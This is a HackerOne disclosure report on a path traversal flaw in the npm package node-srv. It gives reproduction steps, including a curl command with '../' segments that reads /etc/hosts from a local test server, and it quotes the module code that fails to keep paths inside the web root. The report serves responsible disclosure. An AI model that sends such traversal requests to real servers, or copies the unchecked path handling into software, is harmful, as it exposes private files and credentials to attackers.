HackerOne report H1:309124 (bl4de), Jan 25, 2018 - 8:00 p.m.

Node.js third-party modules: [node-srv] Path Traversal allows to read arbitrary files from remote server

2018-01-25 20:00:51
bl4de
hackerone.com


Hi Guys,

node-srv contains a Path Traversal vulnerability, which allows a malicious user to read the content of any file whose path is known.

Module:

Simple static node.js server. Supports Heroku and Grunt.js
https://www.npmjs.com/package/node-srv

Description

node-srv does not sanitize the requested path correctly, so curl can be used to retrieve the content of any file from the remote server.

Steps To Reproduce:

  • install node-srv:

    $ npm install node-srv

  • create a simple server (app.js):

    // Require module
    var Server = require('node-srv');

    // Start server
    var srv = new Server({
        port: 8080,
        root: './',
        logs: true
    }, function () {
        console.log('Server stopped');
    });

  • run the server:

    $ node app.js

  • visit http://127.0.0.1:8080 to verify that everything is fine.

  • now run the following curl command (adjust the number of ../ segments to your system; --path-as-is stops curl from collapsing them client-side):

    $ curl -v --path-as-is http://127.0.0.1:8080/node_modules/../../../../../etc/hosts

You should see the content of the /etc/hosts file:

{F257357}

The problem is that the URL read from the user is not sanitized in any way against the classic ../ path traversal payload. The relevant excerpt from the module (closing braces added so the fragment is complete):

return new Promise((function(_this) {
        return function(resolve, reject) {
          var uri;
          uri = url.parse(req.url);            // legacy url.parse() keeps "../" segments as-is
          return resolve(uri.pathname);
        };
      })(this)).then((function(_this) {
        return function(pathname) {
          filePath = pathname;
          filePath = filePath.replace(/\/$/, "/" + _this.options.index);
          filePath = filePath.replace(/^\//, "");
          // path.resolve() collapses the "../" segments and can walk above root;
          // nothing checks that the result is still inside _this.options.root
          filePath = path.resolve(process.cwd(), _this.options.root || './', filePath);
          return _this.processRequest(res, filePath);
        };
      })(this));

Supporting Material/References:

Configuration I’ve used to find this vulnerability:

  • macOS HighSierra 10.13.3
  • node 8.9.3
  • npm 5.5.1
  • curl 7.54.0

Wrap up

I hope this report will help to keep the Node ecosystem safer. If you have any questions about any details of this finding, please let me know in the comments.

Thank you

Regards,

Rafal ‘bl4de’ Janicki

Impact

This vulnerability allows a malicious user to read the content of any file on the server, which can lead to a data breach or other attacks.